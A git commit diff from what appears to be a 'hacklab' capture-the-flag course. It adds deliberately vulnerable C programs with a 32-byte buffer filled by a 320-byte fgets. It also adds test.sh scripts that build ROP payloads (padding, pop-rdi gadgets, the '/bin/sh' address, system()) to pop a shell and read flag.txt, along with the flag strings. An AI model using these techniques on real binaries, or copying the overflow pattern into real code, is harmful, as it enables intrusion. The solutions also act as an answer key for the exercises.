5

4
2026-01-06 10:49:56 +01:00 · 2026-01-06 08:31:18 +01:00
11 changed files with 70 additions and 0 deletions
--- a/4/level3/test.sh
+++ b/4/level3/test.sh
@@ -0,0 +1,8 @@
+OLDFLAG="hacklab{w3lc0m3_t0_x86_64_explo1t4t1on_I0vGIviy}"
+PADDING="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
+SAVERBP="\x90\xde\xff\xff\xff\x7f\x00\00"
+GADGET1="\xc3\x12\x40\00\00\00\00\00"
+CMDADDR="\x08\x20\x40\00\00\00\00\00"
+CMDCALL="\x96\x11\x40\00\00\00\00\00"
+
+printf "$OLDFLAG\n$PADDING$SAVERBP$GADGET1$CMDADDR$CMDCALL\ncat flag.txt\n" > input.txt
--- a/4/level4/flag.txt
+++ b/4/level4/flag.txt
@@ -0,0 +1 @@
+hacklab{thanks_mario_but_the_flag_is_on_another_server}
--- a/4/level4/input.txt
+++ b/4/level4/input.txt
--- a/4/level4/level4
+++ b/4/level4/level4
--- a/4/level4/level4.c
+++ b/4/level4/level4.c
@@ -0,0 +1,19 @@
+// gcc -o level4 -no-pie -fno-stack-protector level4.c
+#include <stdio.h>
+#include <stdlib.h>
+
+const char command[] = "/bin/sh";
+
+void win(const char *cmd) { system(cmd); }
+
+int main(int argc, char **argv) {
+  // Disable output buffering. Not part of the challenge.
+  setvbuf(stdout, NULL, _IONBF, 0);
+  setvbuf(stdin, NULL, _IONBF, 0);
+
+  char buffer[32];
+  puts("What do you want to talk about?");
+  fgets(buffer, 320, stdin);
+  puts("Bye.");
+  return 0;
+}
--- a/4/level4/test.sh
+++ b/4/level4/test.sh
@@ -0,0 +1,9 @@
+OLDFLAG="hacklab{n3w_c4ll1ng_c0nv3nt1ons!_wYLVjeJr}"
+PADDING="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" #32
+SAVERBP="\x90\xde\xff\xff\xff\x7f\x00\00"  #kind of irrelevant
+GADGET1="\xa4\x12\x40\00\00\00\00\00"      #ret (for stack alignment)
+GADGET2="\xa3\x12\x40\00\00\00\00\00"      #pop rdi, ret
+CMDADDR="\x08\x20\x40\00\00\00\00\00"
+CMDCALL="\x96\x11\x40\00\00\00\00\00"
+
+printf "$OLDFLAG\n$PADDING$SAVERBP$GADGET1$GADGET2$CMDADDR$CMDCALL\ncat flag.txt\n" > input.txt
--- a/4/level5/flag.txt
+++ b/4/level5/flag.txt
@@ -0,0 +1 @@
+hacklab{thanks_mario_but_the_flag_is_on_another_server}
--- a/4/level5/input.txt
+++ b/4/level5/input.txt
--- a/4/level5/level5
+++ b/4/level5/level5
--- a/4/level5/level5.c
+++ b/4/level5/level5.c
@@ -0,0 +1,17 @@
+// gcc -o level5 -no-pie -fno-stack-protector level5.c
+#include <stdio.h>
+#include <stdlib.h>
+
+char command[] = "/bin/sh";
+
+int main(int argc, char **argv) {
+  // Disable output buffering. Not part of the challenge.
+  setvbuf(stdout, NULL, _IONBF, 0);
+  setvbuf(stdin, NULL, _IONBF, 0);
+
+  char buffer[32];
+  puts("What do you want to talk about?");
+  fgets(buffer, 320, stdin);
+  system("echo Bye.");
+  return 0;
+}
--- a/4/level5/test.sh
+++ b/4/level5/test.sh
@@ -0,0 +1,15 @@
+#ROP
+#0x0000000000401283 : pop rdi ; ret
+
+#objdump
+#0000000000404048 g     O .data	0000000000000008              command
+
+OLDFLAG="hacklab{SSE_1n5truct10n5_n33d_spec14l_al1gnm3nt_UwT8mByQ}\n"
+PADDING="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" #32
+SAVERBP="\x90\xde\xff\xff\xff\x7f\x00\00"  #kind of irrelevant
+GADGET1="\x84\x12\x40\00\00\00\00\00"      #ret (for stack alignment)
+GADGET2="\x83\x12\x40\00\00\00\00\00"      #pop rdi, ret
+CMDADDR="\x48\x40\x40\00\00\00\00\00"
+CMDCALL="\x10\x12\x40\00\00\00\00\00"
+
+printf "$OLDFLAG$PADDING$SAVERBP$GADGET2$CMDADDR$CMDCALL\ncat flag.txt\n"
Author	SHA1	Message	Date
Eggert Jung	c823836626	5	2026-01-06 10:49:56 +01:00
Eggert Jung	9019369b0d	4	2026-01-06 08:31:18 +01:00
				`@@ -0,0 +1 @@`
				`hacklab{thanks_mario_but_the_flag_is_on_another_server}`